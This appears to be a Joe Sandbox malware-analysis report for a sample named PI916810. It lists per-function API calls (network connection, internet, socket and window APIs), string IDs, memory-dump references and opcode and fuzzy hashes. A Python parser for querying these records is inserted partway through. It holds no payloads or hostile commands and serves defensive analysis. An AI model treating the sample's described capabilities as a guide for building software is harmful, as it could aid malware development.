• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: __itow_s
• String ID: xrR$xrR
• API String ID: 3653519197-2869713790
• Opcode ID: a5359366b4a03273b68fa3699db7dde10b5c6c8a9316f05a53a87892b09132c9
• Instruction ID: 32e4ce2b8a27fb252799234d42e07fffeb0f9167725c4213c9cab86cd63678b8
• Opcode Fuzzy Hash: a5359366b4a03273b68fa3699db7dde10b5c6c8a9316f05a53a87892b09132c9
• Instruction Fuzzy Hash: B6B19070A00109EBCB14DF55C8A1EAEB7B9FF58304F15805BF9459B392EB38E941CBA5
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0047FEC6: _wcscpy.LIBCMT ref: 0047FEE9
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • __wcsnicmp.LIBCMT ref: 004CB298
                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 004CB361
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                                            • String ID: LPT
                                                                                                                                                                            • API String ID: 3222508074-1350329615
                                                                                                                                                                            • Opcode ID: f6f6c35cf6a815564c8ba49e8a8a1ee0e6c883125998d19d64ef6a0a00834210
                                                                                                                                                                            • Instruction ID: c7e46d919615d0df6a3f6d97775684ed105fe32cb659c10ee8e21cbf96e32190
                                                                                                                                                                            • Opcode Fuzzy Hash: f6f6c35cf6a815564c8ba49e8a8a1ee0e6c883125998d19d64ef6a0a00834210
                                                                                                                                                                            • Instruction Fuzzy Hash: 9E618275A00215AFCB14DF94C886FAEB7B4EB08310F15405FF846AB361D778AE45CB99
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                            • String ID: OaG
                                                                                                                                                                            • API String ID: 4104443479-282697018
                                                                                                                                                                            • Opcode ID: 2e4c3ccd492670544bb02a3a90cbedf26a41496c2e17e6afda5f6f7f999cc9ac
                                                                                                                                                                            • Instruction ID: 86efeeb6e0791ff54db2aad52b959703a10374b921248536920cbace98a164c3
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e4c3ccd492670544bb02a3a90cbedf26a41496c2e17e6afda5f6f7f999cc9ac
                                                                                                                                                                            • Instruction Fuzzy Hash: E8517EB0A00609DFCF24CF69C880AAEB7B1FF55304F14852EE85AD7340EB35A955CB55
                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00472AC8
                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00472AE1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                            • String ID: @
                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                            • Opcode ID: ad9f18423a69b480c6b397ba7e897c44669159c98ca2673c346d104127bf7a28
                                                                                                                                                                            • Instruction ID: ac0e830036d3a619842d5b97779894b3ca47c83edabf34485a7762797a21b82d
                                                                                                                                                                            • Opcode Fuzzy Hash: ad9f18423a69b480c6b397ba7e897c44669159c98ca2673c346d104127bf7a28
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C5168715187449BD320AF11D886BAFBBECFF94314F42885EF2D9410A1EB748928CB1B
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0046506B: __fread_nolock.LIBCMT ref: 00465089
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004C9AAE
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004C9AC1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                            • String ID: FILE
                                                                                                                                                                            • API String ID: 4029003684-3121273764
                                                                                                                                                                            • Opcode ID: 7598e29caced4ca1bfc79a5025334dcfcafdf832905f64c4aed6b7386a17c876
                                                                                                                                                                            • Instruction ID: 6acfe5e0fb74f08d943fec08a6e2f59093b5b7bd6f18778f7807bfc380c07bab
                                                                                                                                                                            • Opcode Fuzzy Hash: 7598e29caced4ca1bfc79a5025334dcfcafdf832905f64c4aed6b7386a17c876
                                                                                                                                                                            • Instruction Fuzzy Hash: E341D875A00609BADF209AA1DC45FEFBBBDEF45714F00046FB900B7181D679AE0487A9
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                            • String ID: DtR$DtR
                                                                                                                                                                            • API String ID: 1473721057-1774046263
                                                                                                                                                                            • Opcode ID: c857f6a15f1d99947e55a827f0caaf5c27ac855d2e4b4632f272c16a48ca8958
                                                                                                                                                                            • Instruction ID: ea21f2af5bd66479cd46076c93e6da38491ca7938a9e84eab6eeb663806af007
                                                                                                                                                                            • Opcode Fuzzy Hash: c857f6a15f1d99947e55a827f0caaf5c27ac855d2e4b4632f272c16a48ca8958
                                                                                                                                                                            • Instruction Fuzzy Hash: F65102786087418FC750CF18C580A1ABBE1BFAA344F54885EE9819B361E335EC95CF97
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004D2892
                                                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004D28C8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CrackInternet_memset
                                                                                                                                                                            • String ID: |
                                                                                                                                                                            • API String ID: 1413715105-2343686810
                                                                                                                                                                            • Opcode ID: 5df8307c025d13a7edc4edfa0165eebd462ced1d4fb4dc137b5a1d6bf1d91ad2
                                                                                                                                                                            • Instruction ID: c2fa323f36b75f4945c314532894f3ad5d2fb194ec04c891bf6b4e64182e3498
                                                                                                                                                                            • Opcode Fuzzy Hash: 5df8307c025d13a7edc4edfa0165eebd462ced1d4fb4dc137b5a1d6bf1d91ad2
                                                                                                                                                                            • Instruction Fuzzy Hash: 97315D71900119AFCF01EFA1CC95EEEBFB8FF18314F10006AF814A6266EB355A16DB65
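The per-function records above (an "APIs" list, a "Strings" list, the dump the function was lifted from, and the "Similarity" identifiers) are easier to triage by query than by eye, for instance to list every dumped function that reaches Sleep or WNetUseConnectionW. The parser below is an added example and is not code from Joe Sandbox or from this report. It assumes the layout seen on this page: each record opens with an "APIs" header, API lines take the form `Name.MODULE(args), ref: ADDR` (CRT helpers are tagged LIBCMT and omit the parentheses), and "String ID" joins several strings with `$`. The SAMPLE text is copied from two records on this page, with the "Download File" link residue left in to show it being stripped.

```python
"""Parse Joe Sandbox per-function 'IDA Plugin' records and query them by API.
Added example, not Joe Sandbox code; format assumptions are as observed on this page."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# API line shapes seen in the report:
#   Sleep.KERNEL32(00000000), ref: 00472AC8
#   _wcscmp.LIBCMT ref: 004C9AAE
#   Part of subcall function 0047FEC6: _wcscpy.LIBCMT ref: 0047FEE9
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str                 # KERNEL32, MPR, WININET, LIBCMT, ...
    ref: int                    # address of the call reference
    args: List[str]             # arguments as printed; '?' means unresolved
    via_subcall: Optional[str]  # callee address when reached through a subcall


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    meta: Dict[str, object] = field(default_factory=dict)

    def string_ids(self) -> List[str]:
        value = self.meta.get("String ID")
        return value.split("$") if isinstance(value, str) and value else []

    def calls_win32(self) -> List[ApiCall]:
        """Imported Win32 calls only; the plugin tags CRT helpers as LIBCMT."""
        return [a for a in self.apis if a.module != "LIBCMT"]


def _clean(raw: str) -> str:
    line = raw.strip().lstrip("•").strip()
    if line.endswith("Download File"):        # page-link residue on 'Associated' lines
        line = line[: -len("Download File")].rstrip()
    return line


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    section = None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":                # every record opens with its APIs block
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                current.apis.append(ApiCall(m.group("name"), m.group("module"),
                                            int(m.group("ref"), 16), args, m.group("caller")))
        elif section == "Strings":
            current.strings.append(line)
        else:
            m = KV_RE.match(line)
            if not m:
                continue
            key, value = m.group("key"), m.group("value")
            if key == "Associated":           # several per record; keep them all
                current.meta.setdefault(key, []).append(value)
            else:
                current.meta[key] = value
    return records


def functions_calling(records: List[FunctionRecord], api_name: str) -> List[FunctionRecord]:
    return [r for r in records if any(a.name == api_name for a in r.apis)]


# Two records copied from this report (sample input for the parser).
SAMPLE = """
APIs
  • Part of subcall function 0047FEC6: _wcscpy.LIBCMT ref: 0047FEE9
  • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
  • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
• __wcsnicmp.LIBCMT ref: 004CB298
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 004CB361
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
APIs
• Sleep.KERNEL32(00000000), ref: 00472AC8
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00472AE1
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• Instruction Fuzzy Hash: 8C5168715187449BD320AF11D886BAFBBECFF94314F42885EF2D9410A1EB748928CB1B
"""
```

Feed the whole "IDA Plugin" section of a report to `parse_records` and use `functions_calling` to pivot on an API of interest; `calls_win32` separates the imported calls from CRT noise so the pivot is not dominated by `_memmove` and friends.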
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 004E6D86
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004E6DC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• _memset.LIBCMT ref: 004C2E00
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004C2E3B
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004E69D0
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004E69DB
Strings
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 00461D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00461D73
  • Part of subcall function 00461D35: GetStockObject.GDI32(00000011), ref: 00461D87
  • Part of subcall function 00461D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00461D91
• GetWindowRect.USER32(00000000,?), ref: 004E6EE0
• GetSysColor.USER32(00000012), ref: 004E6EFA
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 004E6C11
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004E6C20
Strings
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
• _memset.LIBCMT ref: 004C2F11
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004C2F30
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004D2520
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004D2549
Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                                                                            • Opcode ID: 4562acc6e6a95dab70550949bdedac07c6c02e5b8d9db9d226989e9aa23e8984
                                                                                                                                                                            • Instruction ID: d60ec0411f704eeedcac16075ad9dc68550016c323c50127948897de08eb9a08
                                                                                                                                                                            • Opcode Fuzzy Hash: 4562acc6e6a95dab70550949bdedac07c6c02e5b8d9db9d226989e9aa23e8984
                                                                                                                                                                            • Instruction Fuzzy Hash: 82113270101221BADB258F119DB8EFBFFA8FF26350F00812BF90456340D2B46981CAF5
APIs
  • Part of subcall function 004D830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,004D80C8,?,00000000,?,?), ref: 004D8322
• inet_addr.WSOCK32(00000000), ref: 004D80CB
• htons.WSOCK32(00000000), ref: 004D8108
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ByteCharMultiWidehtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 2496851823-2422070025
• Opcode ID: bf208b4d4cb672c2620903d7a973bf035e3fe031e6ddc55223313e860208bbc5
• Instruction ID: fc1cc39e01caa44ffba77597b907ae33c2f8315213e4f95e7087cc6521193d76
• Opcode Fuzzy Hash: bf208b4d4cb672c2620903d7a973bf035e3fe031e6ddc55223313e860208bbc5
• Instruction Fuzzy Hash: 5D11A574600205ABDB20AF64CC96FFEB764FF04324F10852FE91197392DA76A815C659
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00463C26,005262F8,?,?,?), ref: 00470ACE
  • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
• _wcscat.LIBCMT ref: 004A50E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: FullNamePath_memmove_wcscat
• String ID: cR
• API String ID: 257928180-797219872
• Opcode ID: bb793c1b5e882ff8794395d768099f186490dbea5fd5ed9b52b25fcca5474b1d
• Instruction ID: 260c69645322b8ec1c5d099d473e0b8f4e71daef3d4927e04d3d38d72ef5c599
• Opcode Fuzzy Hash: bb793c1b5e882ff8794395d768099f186490dbea5fd5ed9b52b25fcca5474b1d
• Instruction Fuzzy Hash: 5711CC31904218DB8B10EBB5DD01EDD77F8FF18358B1044ABBA4CD7291EA78EB888759
APIs
  • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
  • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004B9355
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 7025caaebda860a66b51a89d2a10637451d3e9f91d15723ee04636c9ba6022db
• Instruction ID: 460cef6a89c49b43efa0946721d380eb474ff227888c8e5c3f89d9f37e1b74ed
• Opcode Fuzzy Hash: 7025caaebda860a66b51a89d2a10637451d3e9f91d15723ee04636c9ba6022db
• Instruction Fuzzy Hash: 8B01D271A45214AB8B08FBA5CC91CFE77A9FF06320B10061AF972572D2EA3959088665
APIs
  • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
  • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
• SendMessageW.USER32(?,00000180,00000000,?), ref: 004B924D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: c5d1929b6e87d5d29144a796e89351d82e2a0db40433af45cdabba17f127378e
• Instruction ID: 28aad9450364a951c267e8c14321ebf90c47c135dd2af0368c9539b151b25330
• Opcode Fuzzy Hash: c5d1929b6e87d5d29144a796e89351d82e2a0db40433af45cdabba17f127378e
• Instruction Fuzzy Hash: B701D871E4120477CB08E7A1C892EFF77A8DF05304F14005BB61267282EA185F1C82B6
APIs
  • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
  • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
• SendMessageW.USER32(?,00000182,?,00000000), ref: 004B92D0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: b2e1c62649282a7ca7c956ef68adfae76e1061c7aee2ae1f048b393d16e472c0
• Instruction ID: a7ed9f18f04b8c865e38e5dcd9c23b588220be7513ed1a58a19b344918e35e9d
• Opcode Fuzzy Hash: b2e1c62649282a7ca7c956ef68adfae76e1061c7aee2ae1f048b393d16e472c0
• Instruction Fuzzy Hash: 0401A771E4120477DB09F7A1C992EFF77AC9F11304F24055BB912632C2EA195F0C927A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: __calloc_crt
• String ID: @RR
• API String ID: 3494438863-2184403932
• Opcode ID: 85f9429872130fb81488f70cc9cc8d620c7f1badd1e958cf54367c6ed5fe9f4c
• Instruction ID: d17d6d3852880e9b315eed2a1fd68476dfc498250bb6c782dc99e436e02a2577
• Opcode Fuzzy Hash: 85f9429872130fb81488f70cc9cc8d620c7f1badd1e958cf54367c6ed5fe9f4c
• Instruction Fuzzy Hash: 8CF0C279308216DBF778EF19BC016AA27D5FB12324B11082FE104CB2C0EB3888869789
APIs
Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
